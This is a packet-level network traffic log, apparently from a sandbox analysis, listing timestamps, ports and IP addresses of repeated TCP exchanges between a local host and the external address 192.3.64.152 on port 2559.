                                                                                                                                              Dec 5, 2024 18:26:08.381716013 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.381823063 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.381831884 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.382000923 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.382009029 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.383460999 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.422071934 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:08.425462008 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:08.502510071 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.502526999 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.502661943 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.502671957 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.503098011 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.503978968 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.503993034 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.504061937 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:08.542218924 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542243958 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542332888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542454958 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542467117 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542479038 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542511940 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542557001 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542567015 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542727947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542737961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542759895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.542826891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.543133020 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545593023 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545675039 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545734882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545768976 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545779943 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545841932 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.545870066 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.546011925 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.546020985 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.546030998 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:08.895114899 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:09.016905069 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.276119947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.331832886 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:09.336076021 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:09.338376999 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:09.458695889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.458762884 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.458775043 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.458820105 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.458837986 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.461811066 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.461944103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.462028980 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.462049961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.464600086 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.464627981 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.464720964 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.464735031 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.464744091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.467564106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.467619896 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.467695951 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.467705011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.467762947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.470262051 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.470282078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.470290899 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.470375061 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.472928047 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.472951889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:09.910098076 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:10.031198978 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.290988922 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.330763102 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:10.332792044 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:10.574541092 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.574596882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.577910900 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.577996016 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.578938961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.578993082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.579363108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.579407930 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.579672098 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.579744101 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.579876900 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.579921961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580014944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580095053 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580233097 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580241919 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580245972 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580251932 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580317974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580530882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580562115 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580620050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.580672026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.581321001 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:10.966289043 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:11.087508917 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.350758076 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.394247055 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:11.478265047 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:11.481113911 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:11.602271080 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602287054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602310896 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602323055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602363110 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602371931 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602415085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602459908 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602575064 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602585077 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602610111 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602618933 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602658033 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.602716923 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605206013 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605216026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605248928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605273962 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605397940 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605426073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605458021 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605473995 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605556011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:11.605565071 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:12.691307068 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:12.811135054 CET255949741192.3.64.152192.168.2.4
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 5, 2024 18:26:13.074811935 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.111618996 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:13.113327980 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:13.231590033 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231612921 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231633902 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231642962 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231686115 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231724024 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231734037 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231786013 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231795073 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231884003 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231894016 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231977940 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231987000 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.231997013 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233526945 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233616114 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233700991 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233769894 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233836889 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233942986 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233952999 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.233994007 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.234045982 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.234082937 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:13.711616993 CET  49741  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:13.833087921 CET  2559  49741  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.097194910 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.144260883 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:14.162894011 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:14.164522886 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:14.282782078 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.282851934 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283061981 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283132076 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283256054 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283308029 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283395052 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283417940 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283597946 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283613920 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283725977 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283823967 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283833981 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.283957958 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284502983 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284594059 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284674883 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284732103 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284796000 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284827948 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284885883 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.284904957 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.285037994 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.285048962 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:14.723048925 CET  49741  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:14.842856884 CET  2559  49741  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.106762886 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.157800913 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:15.159410000 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:15.277638912 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.277724028 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.277766943 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.277776957 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.277894974 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.277982950 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.277992010 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278001070 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278033972 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278050900 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278141975 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278151035 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278166056 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.278191090 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279167891 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279177904 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279243946 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279294968 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279344082 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279366970 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279378891 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279457092 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279561043 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.279575109 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:15.767200947 CET  49741  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:15.887834072 CET  2559  49741  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.152055979 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.214045048 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:16.378385067 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:16.480123043 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:16.501686096 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.501709938 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.501741886 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.501765013 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.501841068 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.505661011 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.505691051 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.505789042 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.505829096 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.508275032 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.508307934 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.508424044 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.508445978 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.508486032 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.604628086 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.604763985 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.604774952 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.604918003 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.604928017 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.607045889 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.607127905 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.607220888 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.607230902 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.607283115 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:16.769954920 CET  49741  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:16.890573025 CET  2559  49741  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.151326895 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.204579115 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:17.206223011 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:17.325298071 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325340986 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325352907 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325371027 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325423002 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325473070 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325505972 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325567961 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325658083 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325711966 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325850010 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325860023 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325982094 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.325990915 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326430082 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326520920 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326529980 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326541901 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326632977 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326641083 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326694012 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326703072 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326797962 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.326806068 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:17.786094904 CET  49741  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:17.908107042 CET  2559  49741  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.173019886 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.219935894 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:18.221613884 CET  49742  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:18.340018034 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340029955 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340044022 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340054035 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340065002 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340075016 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340120077 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340171099 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340269089 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340286970 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340375900 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340451956 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340673923 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.340683937 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.341445923 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.341455936 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.341526031 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.341542959 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.341763973 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.342192888 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.342204094 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.342211962 CET  2559  49742  192.3.64.152  192.168.2.4
Dec 5, 2024 18:26:18.801120996 CET  49741  2559  192.168.2.4  192.3.64.152
Dec 5, 2024 18:26:18.920876980 CET  2559  49741  192.3.64.152  192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.186068058 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.244374037 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:19.478529930 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:19.481807947 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:19.604054928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.604069948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.604145050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.604155064 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.604217052 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.606574059 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.606586933 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.606671095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:19.606756926 CET255949742192.3.64.152192.168.2.4
